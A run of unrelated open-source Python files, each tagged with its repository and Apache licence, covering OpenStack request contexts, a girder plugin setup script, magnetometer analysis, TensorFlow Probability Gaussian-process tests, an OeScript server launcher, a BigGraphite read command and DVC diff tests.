'timestamp': self.timestamp.strftime(
timeutils.PERFECT_TIME_FORMAT) if hasattr(
self, 'timestamp') else None,
'request_id': getattr(self, 'request_id', None),
'quota_class': getattr(self, 'quota_class', None),
'user_name': getattr(self, 'user_name', None),
'service_catalog': getattr(self, 'service_catalog', None),
'project_name': getattr(self, 'project_name', None),
'is_os_admin': getattr(self, 'is_os_admin', None),
'api_version': getattr(self, 'api_version', None),
})
return values
@classmethod
def from_dict(cls, values):
return cls(**values)
def is_user_context(context):
"""Indicates if the request context is a normal user."""
if not context:
return False
if context.is_os_admin:
return False
if not context.user_id or not context.project_id:
return False
return True
def require_context(ctxt):
"""Raise exception.AuthFailure()
if context is not a user or an admin context.
"""
if not ctxt.is_os_admin and not is_user_context(ctxt):
raise exception.AuthFailure()
def get_os_admin_context():
"""Create a context to interact with OpenStack as an administrator."""
admin_session = clients.get_os_admin_session()
return RequestContext(
None, None,
session=admin_session,
is_os_admin=True,
overwrite=False)
|
stackforge/ec2-api
|
ec2api/context.py
|
Python
|
apache-2.0
| 5,158
|
from setuptools import setup
with open('README.md') as readme:
long_description = readme.read()
setup(
name='girder-monkeybrains',
version='1.0.5',
description='Displays monkey neurodevelopmental data.',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/girder/monkeybrains',
maintainer='Kitware, Inc.',
maintainer_email='kitware@kitware.com',
packages=['girder_monkeybrains'],
install_requires=['girder'],
include_package_data=True,
entry_points={
'girder.plugin': [
'monkeybrains = girder_monkeybrains:MonkeybrainsPlugin'
]
}
)
|
girder/monkeybrains
|
setup.py
|
Python
|
apache-2.0
| 672
|
#!/usr/bin/env python
# Chris Riederer
# 2014-08-13
"""This script is to look at the data coming from Physics Toolbox Magnetometer.
It's to help debug the magnet button on Google Cardboard.
"""
import test_detect as t
import sys
if len(sys.argv) < 2:
print "Please provide the name of the file you'd like to analyze."
runData = t.MakeDummyRunData()
with open(sys.argv[1]) as f:
magdata = []
f.readline()
f.readline()
for line in f:
empty, time, x, y, z = line.strip().split(',')
magdata.append(map(float, [time, 0, x, y, z]))
runData['magnetometer'] = magdata
runDataList = [runData]
runDataList = t.preprocessRunData(runDataList)
detector = t.TimeWindowDetector()
detector.segment_time = 175
# detector = t.OriginalDetector()
# t.PlotData(runData)
# t.pl.show()
# t.testDetector(detector, runDataList, optPlotData=True)
t.PlotThresholds(runData, 30, 130, segment_size=400)
|
dodger487/MIST
|
data/analyzePhysicsToolbox.py
|
Python
|
apache-2.0
| 906
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Dependency imports
import numpy as np
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
from tensorflow_probability.python import distributions as tfd
from tensorflow_probability.python.internal import tensorshape_util
from tensorflow_probability.python.internal import test_util
from tensorflow_probability.python.math import psd_kernels
class _GaussianProcessTest(object):
def testShapes(self):
# 5x5 grid of index points in R^2 and flatten to 25x2
index_points = np.linspace(-4., 4., 5, dtype=np.float32)
index_points = np.stack(np.meshgrid(index_points, index_points), axis=-1)
index_points = np.reshape(index_points, [-1, 2])
# ==> shape = [25, 2]
# Kernel with batch_shape [2, 4, 3, 1]
amplitude = np.array([1., 2.], np.float32).reshape([2, 1, 1, 1])
length_scale = np.array([1., 2., 3., 4.], np.float32).reshape([1, 4, 1, 1])
observation_noise_variance = np.array(
[1e-5, 1e-6, 1e-5], np.float32).reshape([1, 1, 3, 1])
batched_index_points = np.stack([index_points]*6)
# ==> shape = [6, 25, 2]
if not self.is_static:
amplitude = tf1.placeholder_with_default(amplitude, shape=None)
length_scale = tf1.placeholder_with_default(length_scale, shape=None)
batched_index_points = tf1.placeholder_with_default(
batched_index_points, shape=None)
kernel = psd_kernels.ExponentiatedQuadratic(amplitude, length_scale)
gp = tfd.GaussianProcess(
kernel,
batched_index_points,
observation_noise_variance=observation_noise_variance,
jitter=1e-5,
validate_args=True)
batch_shape = [2, 4, 3, 6]
event_shape = [25]
sample_shape = [5, 3]
samples = gp.sample(sample_shape, seed=test_util.test_seed())
if self.is_static or tf.executing_eagerly():
self.assertAllEqual(gp.batch_shape_tensor(), batch_shape)
self.assertAllEqual(gp.event_shape_tensor(), event_shape)
self.assertAllEqual(samples.shape,
sample_shape + batch_shape + event_shape)
self.assertAllEqual(gp.batch_shape, batch_shape)
self.assertAllEqual(gp.event_shape, event_shape)
self.assertAllEqual(samples.shape,
sample_shape + batch_shape + event_shape)
self.assertAllEqual(gp.mean().shape, batch_shape + event_shape)
self.assertAllEqual(gp.variance().shape, batch_shape + event_shape)
else:
self.assertAllEqual(self.evaluate(gp.batch_shape_tensor()), batch_shape)
self.assertAllEqual(self.evaluate(gp.event_shape_tensor()), event_shape)
self.assertAllEqual(
self.evaluate(samples).shape,
sample_shape + batch_shape + event_shape)
self.assertIsNone(tensorshape_util.rank(samples.shape))
self.assertIsNone(tensorshape_util.rank(gp.batch_shape))
self.assertEqual(tensorshape_util.rank(gp.event_shape), 1)
self.assertIsNone(
tf.compat.dimension_value(tensorshape_util.dims(gp.event_shape)[0]))
self.assertAllEqual(
self.evaluate(tf.shape(gp.mean())), batch_shape + event_shape)
self.assertAllEqual(self.evaluate(
tf.shape(gp.variance())), batch_shape + event_shape)
def testVarianceAndCovarianceMatrix(self):
amp = np.float64(.5)
len_scale = np.float64(.2)
jitter = np.float64(1e-4)
observation_noise_variance = np.float64(3e-3)
kernel = psd_kernels.ExponentiatedQuadratic(amp, len_scale)
index_points = np.expand_dims(np.random.uniform(-1., 1., 10), -1)
gp = tfd.GaussianProcess(
kernel,
index_points,
observation_noise_variance=observation_noise_variance,
jitter=jitter,
validate_args=True)
def _kernel_fn(x, y):
return amp ** 2 * np.exp(-.5 * (np.squeeze((x - y)**2)) / (len_scale**2))
expected_covariance = (
_kernel_fn(np.expand_dims(index_points, 0),
np.expand_dims(index_points, 1)) +
observation_noise_variance * np.eye(10))
self.assertAllClose(expected_covariance,
self.evaluate(gp.covariance()))
self.assertAllClose(np.diag(expected_covariance),
self.evaluate(gp.variance()))
def testMean(self):
mean_fn = lambda x: x[:, 0]**2
kernel = psd_kernels.ExponentiatedQuadratic()
index_points = np.expand_dims(np.random.uniform(-1., 1., 10), -1)
gp = tfd.GaussianProcess(
kernel, index_points, mean_fn=mean_fn, validate_args=True)
expected_mean = mean_fn(index_points)
self.assertAllClose(expected_mean,
self.evaluate(gp.mean()))
def testCopy(self):
# 5 random index points in R^2
index_points_1 = np.random.uniform(-4., 4., (5, 2)).astype(np.float32)
# 10 random index points in R^2
index_points_2 = np.random.uniform(-4., 4., (10, 2)).astype(np.float32)
# ==> shape = [6, 25, 2]
if not self.is_static:
index_points_1 = tf1.placeholder_with_default(index_points_1, shape=None)
index_points_2 = tf1.placeholder_with_default(index_points_2, shape=None)
mean_fn = lambda x: np.array([0.], np.float32)
kernel_1 = psd_kernels.ExponentiatedQuadratic()
kernel_2 = psd_kernels.ExpSinSquared()
gp1 = tfd.GaussianProcess(
kernel_1, index_points_1, mean_fn, jitter=1e-5, validate_args=True)
gp2 = gp1.copy(index_points=index_points_2,
kernel=kernel_2)
event_shape_1 = [5]
event_shape_2 = [10]
self.assertEqual(gp1.mean_fn, gp2.mean_fn)
self.assertIsInstance(gp1.kernel, psd_kernels.ExponentiatedQuadratic)
self.assertIsInstance(gp2.kernel, psd_kernels.ExpSinSquared)
if self.is_static or tf.executing_eagerly():
self.assertAllEqual(gp1.batch_shape, gp2.batch_shape)
self.assertAllEqual(gp1.event_shape, event_shape_1)
self.assertAllEqual(gp2.event_shape, event_shape_2)
self.assertAllEqual(gp1.index_points, index_points_1)
self.assertAllEqual(gp2.index_points, index_points_2)
self.assertAllEqual(
tf.get_static_value(gp1.jitter), tf.get_static_value(gp2.jitter))
else:
self.assertAllEqual(
self.evaluate(gp1.batch_shape_tensor()),
self.evaluate(gp2.batch_shape_tensor()))
self.assertAllEqual(
self.evaluate(gp1.event_shape_tensor()), event_shape_1)
self.assertAllEqual(
self.evaluate(gp2.event_shape_tensor()), event_shape_2)
self.assertEqual(self.evaluate(gp1.jitter), self.evaluate(gp2.jitter))
self.assertAllEqual(self.evaluate(gp1.index_points), index_points_1)
self.assertAllEqual(self.evaluate(gp2.index_points), index_points_2)
def testLateBindingIndexPoints(self):
amp = np.float64(.5)
len_scale = np.float64(.2)
kernel = psd_kernels.ExponentiatedQuadratic(amp, len_scale)
mean_fn = lambda x: x[:, 0]**2
jitter = np.float64(1e-4)
observation_noise_variance = np.float64(3e-3)
gp = tfd.GaussianProcess(
kernel=kernel,
mean_fn=mean_fn,
observation_noise_variance=observation_noise_variance,
jitter=jitter,
validate_args=True)
index_points = np.random.uniform(-1., 1., [10, 1])
expected_mean = mean_fn(index_points)
self.assertAllClose(expected_mean,
self.evaluate(gp.mean(index_points=index_points)))
def _kernel_fn(x, y):
return amp ** 2 * np.exp(-.5 * (np.squeeze((x - y)**2)) / (len_scale**2))
expected_covariance = (
_kernel_fn(np.expand_dims(index_points, -3),
np.expand_dims(index_points, -2)) +
observation_noise_variance * np.eye(10))
self.assertAllClose(expected_covariance,
self.evaluate(gp.covariance(index_points=index_points)))
self.assertAllClose(np.diag(expected_covariance),
self.evaluate(gp.variance(index_points=index_points)))
self.assertAllClose(np.sqrt(np.diag(expected_covariance)),
self.evaluate(gp.stddev(index_points=index_points)))
# Calling mean with no index_points should raise an Error
with self.assertRaises(ValueError):
gp.mean()
def testMarginalHasCorrectTypes(self):
gp = tfd.GaussianProcess(
kernel=psd_kernels.ExponentiatedQuadratic(), validate_args=True)
self.assertIsInstance(
gp.get_marginal_distribution(
index_points=np.ones([1, 1], dtype=np.float32)),
tfd.Normal)
self.assertIsInstance(
gp.get_marginal_distribution(
index_points=np.ones([10, 1], dtype=np.float32)),
tfd.MultivariateNormalLinearOperator)
def testOneOfCholeskyAndMarginalFn(self):
with self.assertRaises(ValueError):
index_points = np.array([3., 4., 5.])[..., np.newaxis]
tfd.GaussianProcess(
kernel=psd_kernels.ExponentiatedQuadratic(),
index_points=index_points,
marginal_fn=lambda x: x,
cholesky_fn=lambda x: x,
validate_args=True)
def testCustomCholeskyFn(self):
def test_cholesky(x):
return tf.linalg.cholesky(tf.linalg.set_diag(
x, tf.linalg.diag_part(x) + 3.))
# Make sure the points are far away so that this is roughly diagonal.
index_points = np.array([-100., -50., 50., 100])[..., np.newaxis]
gp = tfd.GaussianProcess(
kernel=psd_kernels.ExponentiatedQuadratic(),
index_points=index_points,
cholesky_fn=test_cholesky,
validate_args=True)
# Roughly, the kernel matrix will look like the identity matrix.
# When we add 3 to the diagonal, this leads to 2's on the diagonal
# for the cholesky factor.
self.assertAllClose(
2 * np.ones([4], dtype=np.float64),
gp.get_marginal_distribution().stddev())
def testCustomMarginalFn(self):
def test_marginal_fn(
loc,
covariance,
validate_args=False,
allow_nan_stats=False,
name="custom_marginal"):
return tfd.MultivariateNormalDiag(
loc=loc,
scale_diag=tf.math.sqrt(tf.linalg.diag_part(covariance)),
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
name=name)
index_points = np.expand_dims(np.random.uniform(-1., 1., 10), -1)
gp = tfd.GaussianProcess(
kernel=psd_kernels.ExponentiatedQuadratic(),
index_points=index_points,
marginal_fn=test_marginal_fn,
validate_args=True)
self.assertAllClose(
np.eye(10),
gp.get_marginal_distribution().covariance())
def testGPPosteriorPredictive(self):
amplitude = np.float64(.5)
length_scale = np.float64(2.)
jitter = np.float64(1e-4)
observation_noise_variance = np.float64(3e-3)
kernel = psd_kernels.ExponentiatedQuadratic(amplitude, length_scale)
index_points = np.random.uniform(-1., 1., 10)[..., np.newaxis]
gp = tfd.GaussianProcess(
kernel,
index_points,
observation_noise_variance=observation_noise_variance,
jitter=jitter,
validate_args=True)
predictive_index_points = np.random.uniform(1., 2., 10)[..., np.newaxis]
observations = np.linspace(1., 10., 10)
expected_gprm = tfd.GaussianProcessRegressionModel(
kernel=kernel,
observation_index_points=index_points,
observations=observations,
observation_noise_variance=observation_noise_variance,
jitter=jitter,
index_points=predictive_index_points,
validate_args=True)
actual_gprm = gp.posterior_predictive(
predictive_index_points=predictive_index_points,
observations=observations)
samples = self.evaluate(actual_gprm.sample(10, seed=test_util.test_seed()))
self.assertAllClose(
self.evaluate(expected_gprm.mean()),
self.evaluate(actual_gprm.mean()))
self.assertAllClose(
self.evaluate(expected_gprm.covariance()),
self.evaluate(actual_gprm.covariance()))
self.assertAllClose(
self.evaluate(expected_gprm.log_prob(samples)),
self.evaluate(actual_gprm.log_prob(samples)))
def testLogProbWithIsMissing(self):
index_points = tf.Variable(
[[-1.0, 0.0], [-0.5, -0.5], [1.5, 0.0], [1.6, 1.5]],
shape=None if self.is_static else tf.TensorShape(None))
self.evaluate(index_points.initializer)
amplitude = tf.convert_to_tensor(1.1)
length_scale = tf.convert_to_tensor(0.9)
gp = tfd.GaussianProcess(
kernel=psd_kernels.ExponentiatedQuadratic(
amplitude, length_scale),
index_points=index_points,
mean_fn=lambda x: tf.reduce_mean(x, axis=-1),
observation_noise_variance=.05,
jitter=0.0)
x = gp.sample(5, seed=test_util.test_seed())
is_missing = np.array([
[False, True, False, False],
[False, False, False, False],
[True, False, True, True],
[True, False, False, True],
[False, False, True, True],
])
lp = gp.log_prob(tf.where(is_missing, np.nan, x), is_missing=is_missing)
# For each batch member, check that the log_prob is the same as for a
# GaussianProcess without the missing index points.
for i in range(5):
gp_i = tfd.GaussianProcess(
kernel=psd_kernels.ExponentiatedQuadratic(
amplitude, length_scale),
index_points=tf.gather(index_points, (~is_missing[i]).nonzero()[0]),
mean_fn=lambda x: tf.reduce_mean(x, axis=-1),
observation_noise_variance=.05,
jitter=0.0)
lp_i = gp_i.log_prob(tf.gather(x[i], (~is_missing[i]).nonzero()[0]))
# NOTE: This reshape is necessary because lp_i has shape [1] when
# gp_i.index_points contains a single index point.
self.assertAllClose(tf.reshape(lp_i, []), lp[i])
# The log_prob should be zero when all points are missing out.
self.assertAllClose(tf.zeros((3, 2)),
gp.log_prob(tf.ones((3, 1, 4)) * np.nan,
is_missing=tf.constant(True, shape=(2, 4))))
def testUnivariateLogProbWithIsMissing(self):
index_points = tf.convert_to_tensor([[[0.0, 0.0]], [[0.5, 1.0]]])
amplitude = tf.convert_to_tensor(1.1)
length_scale = tf.convert_to_tensor(0.9)
gp = tfd.GaussianProcess(
kernel=psd_kernels.ExponentiatedQuadratic(
amplitude, length_scale),
index_points=index_points,
mean_fn=lambda x: tf.reduce_mean(x, axis=-1),
observation_noise_variance=.05,
jitter=0.0)
x = gp.sample(3, seed=test_util.test_seed())
lp = gp.log_prob(x)
self.assertAllClose(lp, gp.log_prob(x, is_missing=[False, False]))
self.assertAllClose(tf.convert_to_tensor([np.zeros((3, 2)), lp]),
gp.log_prob(x, is_missing=[[[True]], [[False]]]))
self.assertAllClose(
tf.convert_to_tensor([[lp[0, 0], 0.0], [0.0, 0.0], [0., lp[2, 1]]]),
gp.log_prob(x, is_missing=[[False, True], [True, True], [True, False]]))
@test_util.test_all_tf_execution_regimes
class GaussianProcessStaticTest(_GaussianProcessTest, test_util.TestCase):
is_static = True
@test_util.test_all_tf_execution_regimes
class GaussianProcessDynamicTest(_GaussianProcessTest, test_util.TestCase):
is_static = False
if __name__ == "__main__":
test_util.main()
|
tensorflow/probability
|
tensorflow_probability/python/distributions/gaussian_process_test.py
|
Python
|
apache-2.0
| 15,953
|
#!/usr/bin/python
#
# The contents of this file are subject to the Apache License
# Version 2.0 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License
# from the file named COPYING and from http://www.apache.org/licenses/.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# The Original Code is OeScript.
#
# The Initial Developer of the Original Code is OnExtent, LLC.
# Portions created by OnExtent, LLC are Copyright (C) 2008-2009
# OnExtent, LLC. All Rights Reserved.
#
import datetime
import oescriptimpl
from oescript import *
print "starting python oescript server: %s" % datetime.datetime.now()
signals = None
signals = OesSigHandler("oeserver.pid", "oespy", "info")
if signals == None: raise AsertionError
#todo: signals.add for each obj...
io_dispatcher = OesDispatcher(0, "io_dispatcher")
if io_dispatcher == None: raise AsertionError
template_matcher = OesDispatcher(1, "template_matcher")
if template_matcher == None: raise AsertionError
template_matcher.start()
db_threader = OesThreadDispatcher(4)
if db_threader == None: raise AsertionError
db_threader.start()
store = OesStore(3, "__replace_me_with_data_dir__", True)
if store == None: raise AsertionError
kernel = OesKernel(template_matcher, db_threader, store, False, None, None)
if kernel == None: raise AsertionError
#start ysp socket server
jnet = OesNet(io_dispatcher)
if jnet == None: raise AsertionError
json = OesServer(kernel, io_dispatcher, "oejson://0.0.0.0:7778", jnet, store)
if json == None: raise AsertionError
io_dispatcher.start() #blocking call. server is running now
signals.shutdown() #if is isn't already
|
navicore/oescript_c
|
products/server/python/oeserver.py
|
Python
|
apache-2.0
| 1,967
|
#!/usr/bin/env python
# Copyright 2016 Criteo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Read Command."""
from __future__ import print_function
import time
import datetime
from biggraphite.cli import command
from biggraphite.cli.command_list import list_metrics
from biggraphite import accessor as bg_accessor
class CommandRead(command.BaseCommand):
"""Read points."""
NAME = "read"
HELP = "read points for one or several specific metrics."
def add_arguments(self, parser):
"""Add custom arguments.
See command.CommandBase.
"""
parser.add_argument(
"metrics",
help="One metric name or globbing on metrics names"
)
parser.add_argument(
"--time-start",
action=command.ParseDateTimeArg,
help="Read points written later than this time.",
default=datetime.datetime.now() - datetime.timedelta(minutes=10),
required=False,
)
parser.add_argument(
"--time-end",
action=command.ParseDateTimeArg,
help="Read points written earlier than this time.",
default=datetime.datetime.now(),
required=False,
)
parser.add_argument(
"--stage",
help="Read points from this specific stage.",
default="",
required=False,
)
parser.add_argument(
"--async",
help="Do reads asynchronously.",
action="store_true"
)
def run(self, accessor, opts):
"""Read points.
See command.CommandBase.
"""
accessor.connect()
metrics = list(list_metrics(accessor, opts.metrics))
forced_stage = bg_accessor.Stage.from_string(opts.stage) if opts.stage else None
time_start = opts.time_start
time_end = opts.time_end
async_results = []
if opts.async:
# Fetch all points asynchronously.
for metric in metrics:
results = self._fetch_points(
accessor, metric, time_start, time_end, forced_stage)
async_results.append(results)
else:
async_results = [None] * len(metrics)
for metric, results in zip(metrics, async_results):
if not results:
results = self._fetch_points(
accessor, metric, time_start, time_end, forced_stage)
self._display_metric(metric, results)
@staticmethod
def _fetch_points(accessor, metric, time_start, time_end, stage):
time_start = time.mktime(time_start.timetuple())
time_end = time.mktime(time_end.timetuple())
if stage:
time_start = stage.round_up(time_start)
time_end = stage.round_up(time_end)
else:
time_start, time_end, stage = metric.retention.align_time_window(
time_start, time_end, time.time()
)
points = accessor.fetch_points(metric, time_start, time_end, stage)
return (points, time_start, time_end, stage)
@staticmethod
def _display_metric(metric, results):
"""Print metric's information."""
(points, time_start, time_end, stage) = results
print("Name: ", metric.name)
print("Time window: %s to %s" % (time_start, time_end))
print("Stage: ", str(stage))
print("Points:")
for point in points:
print('%s: %f' % (point[0], point[1]))
print()
|
dpanth3r/biggraphite
|
biggraphite/cli/command_read.py
|
Python
|
apache-2.0
| 4,047
|
import hashlib
import os
import pytest
from funcy import first
from dvc.exceptions import DvcException
from dvc.utils.fs import remove
def digest(text):
return hashlib.md5(bytes(text, "utf-8")).hexdigest()
def test_no_scm(tmp_dir, dvc):
from dvc.scm import NoSCMError
tmp_dir.dvc_gen("file", "text")
with pytest.raises(NoSCMError):
dvc.diff()
def test_added(tmp_dir, scm, dvc):
tmp_dir.dvc_gen("file", "text")
assert dvc.diff() == {
"added": [{"path": "file", "hash": digest("text")}],
"deleted": [],
"modified": [],
"not in cache": [],
"renamed": [],
}
def test_no_cache_entry(tmp_dir, scm, dvc):
tmp_dir.dvc_gen("file", "first", commit="add a file")
tmp_dir.dvc_gen({"dir": {"1": "1", "2": "2"}})
tmp_dir.dvc_gen("file", "second")
remove(tmp_dir / ".dvc" / "cache")
dir_checksum = "5fb6b29836c388e093ca0715c872fe2a.dir"
assert dvc.diff() == {
"added": [
{"path": os.path.join("dir", ""), "hash": dir_checksum},
{"path": os.path.join("dir", "1"), "hash": digest("1")},
{"path": os.path.join("dir", "2"), "hash": digest("2")},
],
"deleted": [],
"modified": [
{
"path": "file",
"hash": {"old": digest("first"), "new": digest("second")},
}
],
"not in cache": [],
"renamed": [],
}
@pytest.mark.parametrize("delete_data", [True, False])
def test_deleted(tmp_dir, scm, dvc, delete_data):
tmp_dir.dvc_gen("file", "text", commit="add file")
(tmp_dir / "file.dvc").unlink()
if delete_data:
(tmp_dir / "file").unlink()
assert dvc.diff() == {
"added": [],
"deleted": [{"path": "file", "hash": digest("text")}],
"modified": [],
"not in cache": [],
"renamed": [],
}
def test_modified(tmp_dir, scm, dvc):
tmp_dir.dvc_gen("file", "first", commit="first version")
tmp_dir.dvc_gen("file", "second")
assert dvc.diff() == {
"added": [],
"deleted": [],
"modified": [
{
"path": "file",
"hash": {"old": digest("first"), "new": digest("second")},
}
],
"not in cache": [],
"renamed": [],
}
def test_refs(tmp_dir, scm, dvc):
tmp_dir.dvc_gen("file", "first", commit="first version")
tmp_dir.dvc_gen("file", "second", commit="second version")
tmp_dir.dvc_gen("file", "third", commit="third version")
HEAD_2 = digest("first")
HEAD_1 = digest("second")
HEAD = digest("third")
assert dvc.diff("HEAD~1") == {
"added": [],
"deleted": [],
"modified": [{"path": "file", "hash": {"old": HEAD_1, "new": HEAD}}],
"not in cache": [],
"renamed": [],
}
assert dvc.diff("HEAD~2", "HEAD~1") == {
"added": [],
"deleted": [],
"modified": [{"path": "file", "hash": {"old": HEAD_2, "new": HEAD_1}}],
"not in cache": [],
"renamed": [],
}
with pytest.raises(DvcException, match=r"unknown Git revision 'missing'"):
dvc.diff("missing")
def test_directories(tmp_dir, scm, dvc):
tmp_dir.dvc_gen({"dir": {"1": "1", "2": "2"}}, commit="add a directory")
tmp_dir.dvc_gen({"dir": {"3": "3"}}, commit="add a file")
tmp_dir.dvc_gen({"dir": {"2": "two"}}, commit="modify a file")
(tmp_dir / "dir" / "2").unlink()
assert dvc.status() != {} # sanity check
dvc.add("dir")
scm.add(["dir.dvc"])
scm.commit("delete a file")
# The ":/<text>" format is a way to specify revisions by commit message:
# https://git-scm.com/docs/revisions
#
assert dvc.diff(":/init", ":/directory") == {
"added": [
{
"path": os.path.join("dir", ""),
"hash": "5fb6b29836c388e093ca0715c872fe2a.dir",
},
{"path": os.path.join("dir", "1"), "hash": digest("1")},
{"path": os.path.join("dir", "2"), "hash": digest("2")},
],
"deleted": [],
"modified": [],
"not in cache": [],
"renamed": [],
}
assert dvc.diff(":/directory", ":/modify") == {
"added": [{"path": os.path.join("dir", "3"), "hash": digest("3")}],
"deleted": [],
"modified": [
{
"path": os.path.join("dir", ""),
"hash": {
"old": "5fb6b29836c388e093ca0715c872fe2a.dir",
"new": "9b5faf37366b3370fd98e3e60ca439c1.dir",
},
},
{
"path": os.path.join("dir", "2"),
"hash": {"old": digest("2"), "new": digest("two")},
},
],
"not in cache": [],
"renamed": [],
}
assert dvc.diff(":/modify", ":/delete") == {
"added": [],
"deleted": [{"path": os.path.join("dir", "2"), "hash": digest("two")}],
"modified": [
{
"path": os.path.join("dir", ""),
"hash": {
"old": "9b5faf37366b3370fd98e3e60ca439c1.dir",
"new": "83ae82fb367ac9926455870773ff09e6.dir",
},
}
],
"not in cache": [],
"renamed": [],
}
def test_diff_no_cache(tmp_dir, scm, dvc):
tmp_dir.dvc_gen({"dir": {"file": "file content"}}, commit="first")
scm.tag("v1")
tmp_dir.dvc_gen(
{"dir": {"file": "modified file content"}}, commit="second"
)
scm.tag("v2")
remove(dvc.odb.local.cache_dir)
# invalidate_dir_info to force cache loading
dvc.odb.local._dir_info = {}
diff = dvc.diff("v1", "v2")
assert diff["added"] == []
assert diff["deleted"] == []
assert first(diff["modified"])["path"] == os.path.join("dir", "")
assert diff["not in cache"] == []
(tmp_dir / "dir" / "file").unlink()
remove(str(tmp_dir / "dir"))
diff = dvc.diff()
assert diff["added"] == []
assert diff["deleted"] == []
assert diff["renamed"] == []
assert diff["modified"] == []
assert diff["not in cache"] == [
{
"path": os.path.join("dir", ""),
"hash": "f0f7a307d223921557c929f944bf5303.dir",
}
]
def test_diff_dirty(tmp_dir, scm, dvc):
tmp_dir.dvc_gen(
{"file": "file_content", "dir": {"dir_file1": "dir file content"}},
commit="initial",
)
(tmp_dir / "file").unlink()
tmp_dir.gen({"dir": {"dir_file2": "dir file 2 content"}})
tmp_dir.dvc_gen("new_file", "new_file_content")
result = dvc.diff()
assert result == {
"added": [
{
"hash": digest("dir file 2 content"),
"path": os.path.join("dir", "dir_file2"),
},
{"hash": "86d049de17c76ac44cdcac146042ec9b", "path": "new_file"},
],
"deleted": [
{"hash": "7f0b6bb0b7e951b7fd2b2a4a326297e1", "path": "file"}
],
"modified": [
{
"hash": {
"new": "38175ad60f0e58ac94e0e2b7688afd81.dir",
"old": "92daf39af116ca2fb245acaeb2ae65f7.dir",
},
"path": os.path.join("dir", ""),
}
],
"not in cache": [],
"renamed": [],
}
def test_no_changes(tmp_dir, scm, dvc):
tmp_dir.dvc_gen("file", "first", commit="add a file")
assert dvc.diff() == {}
def test_no_commits(tmp_dir):
from scmrepo.git import Git
from dvc.repo import Repo
from tests.dir_helpers import git_init
git_init(".")
assert Git().no_commits
assert Repo.init().diff() == {}
def setup_targets_test(tmp_dir):
tmp_dir.dvc_gen("file", "first", commit="add a file")
tmp_dir.dvc_gen({"dir": {"1": "1", "2": "2"}})
tmp_dir.dvc_gen("file", "second")
tmp_dir.dvc_gen(os.path.join("dir_with", "file.txt"), "first")
def test_targets_missing_path(tmp_dir, scm, dvc):
from dvc.exceptions import PathMissingError
setup_targets_test(tmp_dir)
with pytest.raises(PathMissingError):
dvc.diff(targets=["missing"])
def test_targets_single_file(tmp_dir, scm, dvc):
setup_targets_test(tmp_dir)
assert dvc.diff(targets=["file"]) == {
"added": [],
"deleted": [],
"modified": [
{
"path": "file",
"hash": {"old": digest("first"), "new": digest("second")},
}
],
"not in cache": [],
"renamed": [],
}
def test_targets_single_dir(tmp_dir, scm, dvc):
setup_targets_test(tmp_dir)
dir_checksum = "5fb6b29836c388e093ca0715c872fe2a.dir"
expected_result = {
"added": [
{"path": os.path.join("dir", ""), "hash": dir_checksum},
{"path": os.path.join("dir", "1"), "hash": digest("1")},
{"path": os.path.join("dir", "2"), "hash": digest("2")},
],
"deleted": [],
"modified": [],
"not in cache": [],
"renamed": [],
}
assert dvc.diff(targets=["dir"]) == expected_result
assert dvc.diff(targets=["dir" + os.path.sep]) == expected_result
def test_targets_single_file_in_dir(tmp_dir, scm, dvc):
setup_targets_test(tmp_dir)
assert dvc.diff(targets=[os.path.join("dir", "1")]) == {
"added": [{"path": os.path.join("dir", "1"), "hash": digest("1")}],
"deleted": [],
"modified": [],
"not in cache": [],
"renamed": [],
}
def test_targets_two_files_in_dir(tmp_dir, scm, dvc):
setup_targets_test(tmp_dir)
assert dvc.diff(
targets=[os.path.join("dir", "1"), os.path.join("dir", "2")]
) == {
"added": [
{"path": os.path.join("dir", "1"), "hash": digest("1")},
{"path": os.path.join("dir", "2"), "hash": digest("2")},
],
"deleted": [],
"modified": [],
"not in cache": [],
"renamed": [],
}
def test_targets_file_and_dir(tmp_dir, scm, dvc):
setup_targets_test(tmp_dir)
dir_checksum = "5fb6b29836c388e093ca0715c872fe2a.dir"
assert dvc.diff(targets=["file", "dir"]) == {
"added": [
{"path": os.path.join("dir", ""), "hash": dir_checksum},
{"path": os.path.join("dir", "1"), "hash": digest("1")},
{"path": os.path.join("dir", "2"), "hash": digest("2")},
],
"deleted": [],
"modified": [
{
"path": "file",
"hash": {"old": digest("first"), "new": digest("second")},
}
],
"not in cache": [],
"renamed": [],
}
def test_targets_single_dir_with_file(tmp_dir, scm, dvc):
setup_targets_test(tmp_dir)
expected_result = {
"added": [
{
"path": os.path.join("dir_with", "file.txt"),
"hash": digest("first"),
}
],
"deleted": [],
"modified": [],
"not in cache": [],
"renamed": [],
}
assert dvc.diff(targets=["dir_with"]) == expected_result
assert dvc.diff(targets=["dir_with" + os.path.sep]) == expected_result
def test_targets_single_file_in_dir_with_file(tmp_dir, scm, dvc):
setup_targets_test(tmp_dir)
assert dvc.diff(targets=[os.path.join("dir_with", "file.txt")]) == {
"added": [
{
"path": os.path.join("dir_with", "file.txt"),
"hash": digest("first"),
}
],
"deleted": [],
"modified": [],
"not in cache": [],
"renamed": [],
}
@pytest.mark.parametrize("commit_last", [True, False])
def test_diff_add_similar_files(tmp_dir, scm, dvc, commit_last):
if commit_last:
last_commit_msg = "commit #2"
a_rev = "HEAD~1"
else:
last_commit_msg = None
a_rev = "HEAD"
tmp_dir.dvc_gen(
{"dir": {"file": "text1", "subdir": {"file2": "text2"}}},
commit="commit #1",
)
